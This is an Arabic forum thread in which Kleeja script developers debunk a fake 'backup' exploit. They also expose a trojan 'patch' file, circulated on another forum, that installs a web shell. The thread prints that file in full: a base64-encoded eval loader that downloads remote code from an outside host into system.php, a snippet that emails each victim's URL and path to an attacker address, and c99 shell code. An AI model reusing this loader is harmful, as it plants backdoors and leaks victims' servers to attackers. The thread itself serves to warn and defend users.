هام ... ثغرة في النسخة RC6 .. الرجاء الاطلاع !!

[محمد سلوكا]

شكرا لكم على التبليغ

[Tar3Q]

هلا بك عزيزي بدر .. الثغرة قمت بتجربتها وفعلاً هي تعمل ولا تعمل
جربتها على النسخة التطويرية ونسخة rc6 جميعها نفس النتيجة ..
يقوم بتحميل بيكأب من القاعدة لكن فارغة تماماً
http://securityreason.com/exploitalert/8645
http://inj3ct0r.com/exploits/13622

بعد عدة محاولات لتجربة ثغرة البيكأب يتضح بأنه لا يوجد اي ثغرة والكود ليس له اي فائدة واي مطور حقيقي يعرف أن هذا الكود لا يعتبر ثغرة ومستحيل يستفاد منه واعتقد ان كل الحكاية انه هناك هكر جزائري حاول يشهر نفسه امام زملاءه وقام بكتابة اكسبلويت وسجله على انه ثغرة وقام بنشرة للتباهي امام شلة المسنجر والذي استغربه هو لماذا مواقع السكورتي تسجل كل كود على انه ثغرة ؟؟؟ الا يوجد لديهم آلية للتحقق من عمل الثغرات ؟؟؟؟

على العموم تحليل الثغرة نوضحه بناءاً على الاكسبلويت المنشور هنا
http://securityreason.com/exploitalert/8645 و http://inj3ct0r.com/exploits/13622 وهو كالتالي :

كود: تحديد الكل

# Exploit By indoushka 
<?php
$action 	= "http://127.0.0.1/kleeja/admin.php?cp=bckup";
$sql_data = "# 1.0.0RC6, DB version:6\n";
			$sql_data .= "# Kleeja Backup kleeja.com  kleeja version : " . KLEEJA_VERSION . ", DB version:" . $config['db_version'] . "\n";
			$sql_data .= "# DATE : " . gmdate("d-m-Y H:i:s", time()) . " GMT\n";
			$sql_data .= "#\n\n\n";
			
			$db_name_save = $dbname . '_kleeja.sql';
			@set_time_limit(0);
			header("Content-length: " . strlen($outta));
			header("Content-type: text/plain");
			header("Content-Disposition: attachment; filename=$db_name_save");
			echo $sql_data . $outta;
			exit;

?>

بعد بهارات الاكسبلويتات وخاصة الاهداءات للشلة واسم مكتشف الثغرة ... الخ .
في بداية الاكسبلويت استخدمت دالة خاصة بكليجا وهي action لطلب الرابط

كود: تحديد الكل

http://127.0.0.1/kleeja/admin.php?cp=bckup

ويقابلها في ملف admin.php

كود: تحديد الكل

$action	= "admin.php?go=login";

وهو طلب تسجيل دخول الادمن ولا اعرف كيف فكر وقدر هذا الهكر انه بهذه الطريقة سيتمكن من الدخول بصلاحية الادمن ويحصل على نسخة بيكأب القاعدة ولمن لا يعلم .. نظام كليجا مبني بشكل خاص وعلى أساس متين ولكي يتم تنفيذ طلبك مثلاً للحصول على نسخة من البيكأب يجب أن تمر على مراحل متعددة وفي كود الاكسبلويت

كود: تحديد الكل

http://127.0.0.1/kleeja/admin.php?cp=bckup

طلب الاكشن الموجود بملف bckup.php وذلك لتنفيذ طلب نسخة من قاعدة البيانات عبر ملف admin.php وهذا الطلب غير صالح حيث أن في حالة طلب ملف admin.php يجب ان تمر على محرك كليجا واقصد ملف common.php وعمله هو التحقق من كون صاحب الطلب يملك صلاحية الادارة والتحقق يتم عبر الكوكيز والجلسات وكوني لست مبرمج بلغة الـ php فلن اوفي هذا الموضوع حقه كون مسألة التحقق من صلاحية الادارة اعقد مما اظن ومن يقرأ كود ملف admin.php يعرف جيداً انه يجب تخطي كافة مراحل التحقق من صلاحية الادارة كي يتم تنفيذ طلبك .

بعد ذلك استخدم هذه الاكواد

كود: تحديد الكل

$sql_data = "# 1.0.0RC6, DB version:6\n";
			$sql_data .= "# Kleeja Backup kleeja.com  kleeja version : " . KLEEJA_VERSION . ", DB version:" . $config['db_version'] . "\n";
			$sql_data .= "# DATE : " . gmdate("d-m-Y H:i:s", time()) . " GMT\n";
			$sql_data .= "#\n\n\n";
			
			$db_name_save = $dbname . '_kleeja.sql';
			@set_time_limit(0);
			header("Content-length: " . strlen($outta));
			header("Content-type: text/plain");
			header("Content-Disposition: attachment; filename=$db_name_save");
			echo $sql_data . $outta;
			exit;

وهي نفسها الموجود بكود كليجا فقط قام بنسخها من ملف bckup.php ويتواجد بهذا المسار includes/adm وبالضبط هي آخر عشرة اسطر بالملف نسخها كما هي ووضعها في الاكسبلويت وتحتوي على دالة الهيدر وعملها هو http://www.php.net/manual/en/function.header.php ارسال الطلب للتحميل وشيء طبيعي انه يحمل ملف فاضي مكتوب فيه هذه الاسطر

كود: تحديد الكل

# 1.0.0RC6, DB version:6
# Kleeja Backup kleeja.com  kleeja version : KLEEJA_VERSION, DB version:
# DATE : 18-08-2010 03:57:30 GMT
#

حقيقة شيء مضحك .. انه يوجد اشخاص يطلق عليهم هكرز وهم بهذا التفكير المحدود .


الخلاصة من كل هذا انه يستحيل ان تدخل ملف الادمن مباشرة ويجب أن يتم التحقق من هويتك وعندها يتم تنفيذ طلبك وحقيقة أنه زملائي مطورين كليجا سيتملكهم العجب بسبب تحليلي لهذا الكود لأنهم يعتقدون أن الأمر تافه ولا يستحق ولكن أحب دائماً أن أوضح لجميع مستخدمي كليجا الحقيقة وخاصة الذي لا يملكون خبرة ويصدقون ما ينشر في مواقع الكيدي هكر .. وصدقاً لم يكن لدي اي شك باحترافية مهندس كليجا اخوي عبدالرحمن saanina لأنه ما شاء الله تبارك الله لا يدع اي ثغرات بأكواد تكتبها انامله .

لنا لقاء بثغرات قادمة

[saanina]

تحليل جيد يابو زياد رغم انه بنظري لا يحتاج تعب وشرح .. كون الثغره لاتضر فهذا يعني انها ليست ثغره .. وهذا يكفي

[رسـ الغرام ـام]

يعطيك الف عافيه اخوي ابو زياد

لا هنت

[alahamdan]

السلام عليكم

راسلني احد الاعضاء بوجود الثغره في المركز عندنا. رغم اعتقادي انها اذا كانت تخص حساب الادمن فقط فهي غير ضارة ، فملف الادمن غير اسمه وكذلك محمي بفيروول (صلحوني اذا كنت مخطئ).

لكن أرجو منكم اعطائي طريقة معرفة النسخة المنصبة بالضبط، لم احدث النسخه منذ فترة طويلة (كنت قد نصبت النسخه التطويرية). ولا أجد رقم النسخة بالضبط لاتاكد منها.

هل من طريقة لمراسلة احد المطورين برسالة خاصه او من خلال البريد؟ أرغب في اعطائه بعض التفاصيل ولا أرغب نشرها للعامة! مشكورين مقدما.

[saanina]

استخدم نموذج الاتصال بموقع كليجا,
بالنسبة للاصدار في التطويرية فنعتمد على رقم المراجعة المكتوب امام مربع التحميل في الموقع !

والتطويرية يجب تحديثها باستمرار

[Tar3Q]

باك يا شباب

اليوم عدنا بشكل مؤقت لتحليل ثغرة طازة لكليجا ,,
بالطبع كان هناك بلاغ في مركز الاخطاء البرمجية
عن وجود ثغرة في سكربت كليجا هذا الرابط http://www.kleeja.com/bugs/?go=view&id=817
وقد وضع الاخ الذي قام بالتبليغ رابط لموضوع يتواجد في موقع مطور http://www.mtwer.com/vb/t62170.html


وهذا النص مقتبس من الموضوع كاملاً

ثغرة ابلود فى اسكريبت kleeja

السلام عليكم ورحمة الله وبركاتة
مع الاسف يا شباب ظهرت ثغرة فى الاوانة الاخيرة دمرت مواقع عربية كتيرة
الثغرات التى ظهرت لكليجا اثنان
وهما ثغرة CSRF Change Admin Password
Kleeja Upload - CSRF Change Admin Password
وثغرة Database
kleeja 1.0.0RC6 Database Disclosure
واخيرا ثغرة الموضوع ثغرة ابلود يستطيع المخترق ان يزرع اكواد خبيثة فى الموقع تمكنة من اختراق الموقع
الثغرة بتاريخ 2/2/2011
طريقة الترقيع ارفع ملف الترقيع فى فولدر الاسكريت واعطية تصريح 777
ثم استعرض الملف من المتصفح بعد استعراضك للملف يمكنك حذفة حيث انة اقام بوظيفتة
ملف الترقيع

http://www.mediafire.com/?nh2310i7qs12arh
ملاحظة اذا كنت تستخدم النسخة القديمة من كليجا ومصابة احد الثغرتين المذكورتين فى الاعلى اعلم ان ملف الترقيع يرقع ثغرة الابلود فقط اى يمنع رفع الملفات ذات الامتدادت الخبيثة عن طريق خدع المخترقين بمذودات المتصفح
بينما يتوجب عليك تحديث كليجا قبل ترقيعة من الثغرة الجديدة

الآن نأتي لتحليل الثغرة

لقد كان يعيش وحيداً وفي أحدى الليالي المظلمة ومن خلف شاشة وكيبورد اشتاق احد شباب مصر من اطفال الهكرز لممارسة العربدة واختراق مواقع اخوانه المسلمين بدون اي تفكير في العواقب بل يريد الاختراق من اجل الشهرة المريضة والتي يبحث عنها بين اصحابه ولأنه ضعيف ولا يملك خبرة عالية تمكنه من الاطاحة برؤوس السيرفرات لجأ لحيلة الضعفاء والتي يعتمد فيها على مبدأ الخبث والكذب من اجل تحقيق اهدافه ..

وقد تأمل هذا الهكر في واقع مجتمع اصحاب المواقع العربي وقد تفتق عقله المريض بحقيقة وهي أن اغلب من يملك موقع من العرب ,, اما ملكه بالصدفه وبدون تخطيط او عمل قطة مع اصحابه لكي يستطيع انشاء موقع وقد ركز في قصته على الواقع المر الذي تبين له بأن الاغلبية منهم يجهلون الكثير من الامور ويطيرون بالعجة .

لهذا فكر هذا المريض واختلق قصة ثغرة جديدة في كليجا وقام بوضح الترقيع المناسب لهذه الثغرة الخيالية وشرح طريقة ترقيع الثغرة باسهاب

طريقة الترقيع ارفع ملف الترقيع فى فولدر الاسكريت واعطية تصريح 777
ثم استعرض الملف من المتصفح بعد استعراضك للملف يمكنك حذفة حيث انة اقام بوظيفتة

وملف الترقيع اللي وضعه هنا http://www.mediafire.com/?nh2310i7qs12arh
ويحتوي على هذا الكود

كود: تحديد الكل

//kleeja do not upload exploit
<?php
eval(base64_decode('JGZpbGUgPSBmb3Blbigic3lzdGVtLnBocCIgLCJ3KyIpOyAvLyA/Pz8/PyBwaHANCg0KJGFsbmptPWZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc2NvdHRzZGFsZXNraW5hbmRob2xpc3RpY2hlYWx0aC5jb20vdXBsb2FkLnR4dCcpOyAvLyB7Pz8/ID8/Pz8/IHR4dA0KDQokc2VjdXJpdHl3YXIgPSBmd3JpdGUgKCRmaWxlICwkYWxuam0pOyANCg0KZmNsb3NlKCRmaWxlKTsNCg0KaWYgKCRzZWN1cml0eXdhcikgew0KDQplY2hvICJHb29kIGluZGV4IjsNCg0KfQ=='));
?>

<?php
// css 3cd for indexs
//css 3cd for indexs
// css 3cd for indexs
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
$to = "wal3a_wal3a@hotmail.com";
$subject = "newshell";
$header = "from: EGFM <mmm@ssss.com>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;
}
?>
</body></html>
<?php chdir($lastdir); c99shexit(); ?>

ههههههههههههه الله المستعان وكفى

هذا الكود هو من سوف يتسبب بالاختراق ولا اعرف من اي حصل هذا الهكر على هذا الخبث باختراع هذه القصة والاهم الترقيع الذي وضعه ولكن اعتقد أنه تفكير يهود فربما انه جدته العاشرة لأمه يهودية وتملك من الدهاء الكثير ,, اقول ربما ..


عموماً الملف يحتوي على كود مشفر وحقيقة لم اقم بفك تشفيره ولكن اعتقد انه شيل c99 يتم حقنه بقاعدة البيانات ليتمكن من الدخول فيما بعد وايضاً يحتوي على تبليغ صاروخ على ايميل الدلخ wal3a_wal3a@hotmail.com يعني اي شخص رفع الملف على موقعه وقام بتشغيله سيصل لايميل الغبي رابط الموقع الضحية وسيتم اختراقه سريعاً سريعاً .

المحزن في الامر هو ان هذا الهكر قام بنشر موضوعه في موقع (مطور) الذي يهتم بنشر الثقافة التطويرية لدى المستخدمين العرب والمضحك المبكي هو ان المووضوع قد طارت به الركبان والعم قوقل يشهد على ذلك
الرابط http://www.google.com.sa/search?sourcei ... afe=active

لماذا يا اصحاب المواقع التطويرية لا تتحققون من المواضيع الحساسة التي تضر باخوانكم اصحاب المواقع ؟؟
لماذا يا ادارة مطور ؟؟
لا اريد الاسترسال في الموضوع أكثر لأنني اصبت بالحزن والاحباط من واقع مجتمعنا العربي ..


طبعاً الآن نجي للبطل صاحب كل هذا الفكرة الغبية ..
الاخ مصري يملك موقع sh3ll.org و t00ls.org
كلاهما تؤدي على نفس الموقع ويستخدم لأحد الدومينات خدمة برايفت هوز وهي لإخفاء بياناته ولكنه مفضوح
ايضاً عضو مشارك في موقع ترايدنت هذا رابط عضويته http://www.traidnt.net/vb/member.php?u=74180
وهذا احدى مواضيعه في ترايدنت يبحث عن المزيد من الضحايا http://www.traidnt.net/vb/showpost.php? ... ostcount=8

ناهيك على مشاركته باغلب مواقع الهكرز والمواقع التطويرية العربية واحدهما موقع سوالف سوفت

هنا انتهينا من تحليل ثغرة كليجا الجديدة

شكراً

[مؤيد]

ابو زياد مب هنا المشششكله ..
المشكله من اصحاب المواقع اللي تصدق الخبر .!!!


ليه ما ننزل مووضوع بمطور تحذير ؟

[Tar3Q]

والله ما أدري يا مؤيد ,, ليش
اين مشرف القسم !!!
اين ادارة الموقع !!!
عموماً ارسلت لهم رسالة بها رابط هذا الموضوع
وسنكون بالانتظار !!

[phpfalcon]

ياهلا ياهلا ياهلا نورتنا ,,,اهلا بعودتك يااالغالي

انا منصدم ؟؟؟ هذا الشخص الغبي مايفكر في شخص راح يكشفه مثل ابو زياد ؟؟

بعدين لازم نحذر الناس من النقطه هذي في المستقبل يعني مثلا نكتب فقره باعلى المنتدى مع شوية ارشادات , لذلك انا اطالب دائما بمنتدى خاص بكليجا عشان ناخذ خصوصيتنا بشكل اكبر عن مفيد